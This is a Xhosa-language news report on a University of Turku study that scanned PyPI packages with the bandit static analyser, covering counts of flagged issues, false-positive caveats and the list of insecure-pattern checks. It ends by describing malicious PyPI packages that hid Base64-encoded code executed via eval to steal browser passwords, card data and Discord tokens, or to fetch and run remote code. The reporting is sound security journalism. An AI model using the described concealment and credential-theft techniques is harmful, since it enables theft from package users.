Iqela labaphandi abavela kwiYunivesithi yaseTurku (eFinland) lipapashe iziphumo zokuhlalutya iipakethe kwindawo yokugcina iPyPI yokusetyenziswa kwezinto ezinokuthi zibe yingozi ezinokukhokelela ekubeni buthathaka. Ngexesha lokuhlalutya iipakethe eziliwaka le-197, i-749 yamawaka eengxaki zokhuseleko zichongiwe. I-46% yeepakethe inengxaki enye ubuncinane. Phakathi kwezona ngxaki zixhaphakileyo ziintsilelo ezinxulumene nokuphathwa kwangaphandle kunye nokusetyenziswa kweempawu ezivumela ukutshintshwa kwekhowudi.
Kwiingxaki ezingama-749 amawaka ezichongiweyo, ama-442 amawaka (41%) abhalwe njengezincinane, ama-227 amawaka (30%) njengeengxaki eziphakathi kunye nama-80 amawaka (11%) njengeziyingozi. Ezinye iipakethi ziphuma kwisihlwele kwaye ziqulethe amawaka eengxaki: umzekelo, iphakheji ye-PyGGI ichonge iingxaki ze-2589, ngokukodwa ezinxulumene nokusetyenziswa kokwakhiwa "zama-ngaphandle kokudlula", kunye nephakheji ye-appengine-sdk ifumene iingxaki ze-2356. Inani elikhulu leengxaki zikhona kwi-genie.libs.ops, pbcore kunye ne-genie.libs.parser packages.
Kufuneka kuqatshelwe ukuba iziphumo zifunyenwe ngokusekelwe kuhlalutyo oluzenzekelayo lwe-static, olungathatheli ingqalelo umxholo wokusetyenziswa kwezakhiwo ezithile. Umphuhlisi we-toolkit ye-bandit, eyayisetyenziselwa ukuskena ikhowudi, uvakalise uluvo lokuba ngenxa yenani eliphezulu lobuxoki, iziphumo zokuskena azikwazi ukuqwalaselwa ngokuthe ngqo ukuba buthathaka ngaphandle kokuphononongwa okongeziweyo ngesandla kumcimbi ngamnye.
Ngokomzekelo, i-analyzer iqwalasela ukusetyenziswa kwee-generator inombolo engathembekanga kunye ne-hashing algorithms, njenge-MD5, ibe yingxaki yokhuseleko, ngelixa kwikhowudi i-algorithms enjalo ingasetyenziselwa iinjongo ezingachaphazeli ukhuseleko. I-analyzer iqwalasela nayiphi na inkqubo yedatha yangaphandle kwimisebenzi engakhuselekanga efana ne-pickle, yaml.load, subprocess kunye ne-eval ingxaki, kodwa oku kusetyenziswa akubandakanyi ubuthathaka kwaye ngokwenene ukusetyenziswa kwale misebenzi kunokuphunyezwa ngaphandle kwesoyikiso sokhuseleko. .
Phakathi kweemvavanyo ezisetyenziswe kuphononongo:
- Ukusebenzisa imisebenzi enokuthi ingakhuselekanga exec, mktemp, eval, mark_safe, njl.
- Ulungiselelo olungakhuselekanga lwamalungelo okufikelela kwiifayile.
- Ukuqhoboshela isiseko sothungelwano kuzo zonke iindawo zenethiwekhi.
- Ukusetyenziswa kwamagama ayimfihlo kunye nezitshixo ezichazwe ngokungqongqo kwikhowudi.
- Ukusebenzisa uvimba weefayili wexeshana ochazwe kwangaphambili.
- Ukusebenzisa ipasi kwaye uqhubele phambili ngokubambisa-zonke-izimbo zokuphatha ngaphandle;
- Izisa usetyenziso lwewebhu olusekwe kwisakhelo se-Flask yewebhu enemo yokulungisa ivuliwe.
- Ukusebenzisa iindlela ezingakhuselekanga zokuchithwa kwedatha.
- Isebenzisa i-MD2, MD4, MD5 kunye ne-SHA1 imisebenzi ye-hash.
- Ukusetyenziswa kwee-ciphers ze-DES ezingakhuselekanga kunye neendlela zoguqulelo oluntsonkothileyo.
- Ukusetyenziswa kwe-HTTPSConnection engakhuselekanga ukuphunyezwa kwezinye iinguqulelo zePython.
- Ichaza ifayile:// iskimu kwi-urlopen.
- Ukusebenzisa iijenereyitha zeenombolo zepseudorandom xa usenza imisebenzi ye-cryptographic.
- Ukusebenzisa iTelnet protocol.
- Ukusebenzisa iipaluli ze-XML ezingakhuselekanga.
Ukongezelela, kunokuqatshelwa ukuba iipakethe ezi-8 ezinobungozi zifunyenwe kwi-directory ye-PyPI. Phambi kokususwa, iipakethe eziyingxaki zakhutshelwa ngaphezulu kwamawaka angama-30 amaxesha. Ukufihla umsebenzi okhohlakeleyo kunye nezilumkiso zokudlula kubahlalutyi abalula be-static kwiipakethi, iibhloko zekhowudi zafakwa ngekhowudi kusetyenziswa i-Base64 kwaye zenziwa emva kokwenza ikhowudi kusetyenziswa umnxeba wokulinganisa.
I-noblesse, i-genesisbot, ihlupheke, iipakethe ze-noblesse2 kunye ne-noblessev2 ziqulethe ikhowudi yokuthintela amanani ekhadi letyala kunye namagama ayimfihlo agcinwe kwi-Chrome kunye ne-Edge browser, kunye nokudlulisa amathokheni e-akhawunti kwisicelo se-Discord kunye nokuthumela idatha yenkqubo, kubandakanywa neskrini semixholo yesikrini. Iiphakheji ze-pytagora kunye ne-pytagora2 zibandakanya ukukwazi ukulayisha kunye nokwenza ikhowudi ephunyeziweyo yomntu wesithathu.
umthombo: opennet.ru